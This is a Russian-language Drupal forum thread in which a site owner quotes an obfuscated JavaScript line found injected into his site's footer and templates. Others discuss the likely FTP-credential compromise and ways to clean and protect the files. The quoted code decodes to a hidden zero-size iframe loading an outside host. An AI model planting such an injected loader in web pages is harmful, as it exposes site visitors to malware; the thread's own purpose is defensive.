27 августа 2007 в 22:35
Обнаружил на сайте вот такую строчку в футтере:
<script language=JavaScript> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C115%2C104%2C97%2C100%2C48%2C119%2C46%2C111%2C110%2C108%2C105%2C110%2C101%2C104%2C111%2C115%2C116%2C101%2C114%2C46%2C110%2C101%2C116%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));</script>
Не подскажете, кто знает... как, откуда, почему и что теперь править... ?
Комментарии
оп... нашел.... это пэйдж-тпл... ну ладно индекс.... но как они туда добрались?????
хм. вирусы мутируют
а может в теме так было?
чего за тема установлена?
см. тему http://drupal.ru/node/7386 и проверяй компы имеющие доступ к ftp на вирусы. ещё лучше не пользоваться ftp совсем.
ага, я уже тоже http://drupal.ru/node/7386 нашел. но непонятно, всетаки page.tpl.php хакнули... внутри темы... типа продвинутый робот знает друпал выходит
Вряд ли. Скорее всего ручками подправить не поленились. Это ж денежки, и пары минут на это совсем-совсем не жалко.
тема по названью блюмарином осталась... видимо не лишне менять названия тем?
ставьте фаер, не качайте непонятных файлов и не ходите на ненадежные сайты через ИЕ, и будет Вам счастье
И у меня подобным образом хакали сайт - сначала несколько раз прописывали эту строчку в конец index.php, а затем оказались изменены все tpl файлы в моей собственноручно сделанной теме. Я на тот момент решил проблему таким образом - снял права доступа на запись в файлы index.php и файлы темы. Пока больше хак не повторялся. Но пароли клиенту порекоммендую сменить (за безопасностью собственного компа слежу конкретно).
хм, пойду-ка я проверю свои подвалы....